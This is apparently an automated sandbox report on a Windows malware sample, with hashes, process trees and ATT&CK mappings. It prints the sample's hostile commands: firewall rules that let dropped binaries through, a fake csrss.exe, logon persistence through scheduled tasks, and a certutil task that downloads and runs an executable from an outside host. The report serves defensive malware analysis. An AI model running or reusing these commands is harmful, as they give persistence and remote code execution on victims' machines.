3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5

General

Target

3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
Size

3.8MB
MD5

a8a06dda58372e281b89e933e33e30e7
SHA1

86a815d7a725411d48dff6b1457903e7db4f1870
SHA256

3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5
SHA512

f618c2ed2fe6fcaf068f1074ed4dd4b3e06d54d65f2820b942675645039f381c8a10bc79aa0909b4a9fe4007ba2251741df6c50bad4a31827f7561b3be120a6b

Score

8^/10

evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

2156 bcdedit.exe

pid	process
2156	bcdedit.exe

Program crash 63 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3080	2304	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
1956	2304	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
1908	2304	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
384	2304	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
2096	2304	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
3268	2304	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
1788	2304	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
4112	2304	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
4408	2304	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
4948	2304	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
3408	2304	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
3472	2304	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
320	2304	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
3508	2304	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
2852	2304	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
4008	2304	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
1816	2304	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
4556	3256	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
4660	3256	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
4564	3256	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
2696	3256	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
632	3256	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
2444	3256	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
3156	3256	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
3124	3256	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
1704	3256	WerFault.exe	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
1224	2212	WerFault.exe	csrss.exe
4896	2212	WerFault.exe	csrss.exe
2004	2212	WerFault.exe	csrss.exe
2276	2212	WerFault.exe	csrss.exe
3948	2212	WerFault.exe	csrss.exe
4112	2212	WerFault.exe	csrss.exe
5092	2212	WerFault.exe	csrss.exe
5060	2212	WerFault.exe	csrss.exe
4088	2212	WerFault.exe	csrss.exe
3928	2212	WerFault.exe	csrss.exe
768	2212	WerFault.exe	csrss.exe
1900	2212	WerFault.exe	csrss.exe
3408	2212	WerFault.exe	csrss.exe
2020	2212	WerFault.exe	csrss.exe
320	2212	WerFault.exe	csrss.exe
3752	2212	WerFault.exe	csrss.exe
3884	2212	WerFault.exe	csrss.exe
1816	2212	WerFault.exe	csrss.exe
5096	2212	WerFault.exe	csrss.exe
1832	2212	WerFault.exe	csrss.exe
4272	2212	WerFault.exe	csrss.exe
1532	2212	WerFault.exe	csrss.exe
796	2212	WerFault.exe	csrss.exe
3504	2212	WerFault.exe	csrss.exe
2036	2212	WerFault.exe	csrss.exe
3420	2212	WerFault.exe	csrss.exe
4736	2212	WerFault.exe	csrss.exe
2740	2212	WerFault.exe	csrss.exe
4772	2212	WerFault.exe	csrss.exe
4908	2212	WerFault.exe	csrss.exe
4832	2212	WerFault.exe	csrss.exe
3236	2212	WerFault.exe	csrss.exe
3676	2212	WerFault.exe	csrss.exe
4904	2212	WerFault.exe	csrss.exe
4896	2212	WerFault.exe	csrss.exe
724	2212	WerFault.exe	csrss.exe
4424	2212	WerFault.exe	csrss.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3592 schtasks.exe
4228 schtasks.exe

pid	process
3592	schtasks.exe
4228	schtasks.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe

pid	process
2304	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
2304	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	2304	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
Token: SeImpersonatePrivilege	2304	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
Token: SeTcbPrivilege	2952	svchost.exe
Token: SeTcbPrivilege	2952	svchost.exe

C:\Users\Admin\AppData\Local\Temp\3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
"C:\Users\Admin\AppData\Local\Temp\3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 368
2⤵
- Program crash
PID:3080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 372
2⤵
- Program crash
PID:1956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 620
2⤵
- Program crash
PID:1908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 708
2⤵
- Program crash
PID:384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 700
2⤵
- Program crash
PID:2096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 700
2⤵
- Program crash
PID:3268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 760
2⤵
- Program crash
PID:1788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 372
2⤵
- Program crash
PID:4112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 784
2⤵
- Program crash
PID:4408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 760
2⤵
- Program crash
PID:4948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 872
2⤵
- Program crash
PID:3408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 724
2⤵
- Program crash
PID:3472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 620
2⤵
- Program crash
PID:320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 720
2⤵
- Program crash
PID:3508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 620
2⤵
- Program crash
PID:2852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 768
2⤵
- Program crash
PID:4008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 620
2⤵
- Program crash
PID:1816

C:\Users\Admin\AppData\Local\Temp\3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
"C:\Users\Admin\AppData\Local\Temp\3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe"
2⤵
PID:3256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3256 -s 324
3⤵
- Program crash
PID:4556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3256 -s 328
3⤵
- Program crash
PID:4660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3256 -s 356
3⤵
- Program crash
PID:4564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3256 -s 684
3⤵
- Program crash
PID:2696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3256 -s 584
3⤵
- Program crash
PID:632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3256 -s 700
3⤵
- Program crash
PID:2444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3256 -s 700
3⤵
- Program crash
PID:3156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3256 -s 676
3⤵
- Program crash
PID:3124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3256 -s 732
3⤵
- Program crash
PID:1704

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23.exe" enable=yes"
3⤵
PID:4492

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
PID:1144

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:2212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 372
4⤵
- Program crash
PID:1224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 392
4⤵
- Program crash
PID:4896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 548
4⤵
- Program crash
PID:2004

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:3592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 592
4⤵
- Program crash
PID:2276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 592
4⤵
- Program crash
PID:3948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 892
4⤵
- Program crash
PID:4112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 948
4⤵
- Program crash
PID:5092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 980
4⤵
- Program crash
PID:5060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 892
4⤵
- Program crash
PID:4088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 892
4⤵
- Program crash
PID:3928

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:2156

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 780
4⤵
- Program crash
PID:768

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:4228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 368
4⤵
- Program crash
PID:1900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 932
4⤵
- Program crash
PID:3408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 988
4⤵
- Program crash
PID:2020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 932
4⤵
- Program crash
PID:320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1504
4⤵
- Program crash
PID:3752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1768
4⤵
- Program crash
PID:3884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1784
4⤵
- Program crash
PID:1816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1796
4⤵
- Program crash
PID:5096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1528
4⤵
- Program crash
PID:1832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1536
4⤵
- Program crash
PID:4272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1560
4⤵
- Program crash
PID:1532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1548
4⤵
- Program crash
PID:796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1932
4⤵
- Program crash
PID:3504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1732
4⤵
- Program crash
PID:2036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1768
4⤵
- Program crash
PID:3420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1908
4⤵
- Program crash
PID:4736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1952
4⤵
- Program crash
PID:2740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1584
4⤵
- Program crash
PID:4772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1592
4⤵
- Program crash
PID:4908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1532
4⤵
- Program crash
PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 444
4⤵
- Program crash
PID:3236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 936
4⤵
- Program crash
PID:3676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 472
4⤵
- Program crash
PID:4904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1456
4⤵
- Program crash
PID:4896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1552
4⤵
- Program crash
PID:724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1860
4⤵
- Program crash
PID:4424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2304 -ip 2304
1⤵
PID:3108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2304 -ip 2304
1⤵
PID:3880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2304 -ip 2304
1⤵
PID:4260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2304 -ip 2304
1⤵
PID:5060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2304 -ip 2304
1⤵
PID:4180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2304 -ip 2304
1⤵
PID:1304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2304 -ip 2304
1⤵
PID:2560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2304 -ip 2304
1⤵
PID:4540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2304 -ip 2304
1⤵
PID:4656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2304 -ip 2304
1⤵
PID:3204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2304 -ip 2304
1⤵
PID:5052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2304 -ip 2304
1⤵
PID:3380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2304 -ip 2304
1⤵
PID:1800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2304 -ip 2304
1⤵
PID:216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2304 -ip 2304
1⤵
PID:4380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2304 -ip 2304
1⤵
PID:1620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2304 -ip 2304
1⤵
PID:2268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3256 -ip 3256
1⤵
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3256 -ip 3256
1⤵
PID:4576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3256 -ip 3256
1⤵
PID:4632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3256 -ip 3256
1⤵
PID:4756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3256 -ip 3256
1⤵
PID:5116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3256 -ip 3256
1⤵
PID:4880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3256 -ip 3256
1⤵
PID:2368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3256 -ip 3256
1⤵
PID:2704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3256 -ip 3256
1⤵
PID:2740

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23.exe" enable=yes
1⤵
PID:1808

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
PID:620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2212 -ip 2212
1⤵
PID:752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2212 -ip 2212
1⤵
PID:3980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2212 -ip 2212
1⤵
PID:5004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2212 -ip 2212
1⤵
PID:2432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2212 -ip 2212
1⤵
PID:3940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2212 -ip 2212
1⤵
PID:3656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2212 -ip 2212
1⤵
PID:2292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2212 -ip 2212
1⤵
PID:4200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2212 -ip 2212
1⤵
PID:2376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2212 -ip 2212
1⤵
PID:4520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2212 -ip 2212
1⤵
PID:724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2212 -ip 2212
1⤵
PID:1256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2212 -ip 2212
1⤵
PID:5052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2212 -ip 2212
1⤵
PID:3848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2212 -ip 2212
1⤵
PID:3540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2212 -ip 2212
1⤵
PID:4412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2212 -ip 2212
1⤵
PID:1912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2212 -ip 2212
1⤵
PID:2268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2212 -ip 2212
1⤵
PID:536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2212 -ip 2212
1⤵
PID:4560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2212 -ip 2212
1⤵
PID:4332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2212 -ip 2212
1⤵
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2212 -ip 2212
1⤵
PID:2488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2212 -ip 2212
1⤵
PID:4844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2212 -ip 2212
1⤵
PID:2680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2212 -ip 2212
1⤵
PID:3696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2212 -ip 2212
1⤵
PID:1104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2212 -ip 2212
1⤵
PID:4224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2212 -ip 2212
1⤵
PID:4444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2212 -ip 2212
1⤵
PID:928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2212 -ip 2212
1⤵
PID:1612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2212 -ip 2212
1⤵
PID:2624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2212 -ip 2212
1⤵
PID:4420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2212 -ip 2212
1⤵
PID:4480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2212 -ip 2212
1⤵
PID:1256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2212 -ip 2212
1⤵
PID:3320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2212 -ip 2212
1⤵
PID:3956

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
92KB

MD5
9f58ce177fe3920ea79485d39bb135b7

SHA1
51210fb39324c41b78a2c739b257477e79d3d7de

SHA256
abfff74a5c6ab227018612ebace2a3599b333568db0714b9956770f0f64dd33e

SHA512
1e0efca8b794721c7840fff8eda75949b022488a66ab88004b869ba8d0357d271bf311c5e284de6fffb9654d619c8fdfe0fc93ffed08c4811aaa59f75e4aa84d

Download Submit
C:\Windows\rss\csrss.exe
Filesize
502KB

MD5
b5417c321b716311116c106bdea9f160

SHA1
9fbfb47a95e09a246fbe8e4f99b57e5e3f76e609

SHA256
ebf014e16901d400f36b6794ecd7865ad9cae3d3766417117b5024fecee5e11c
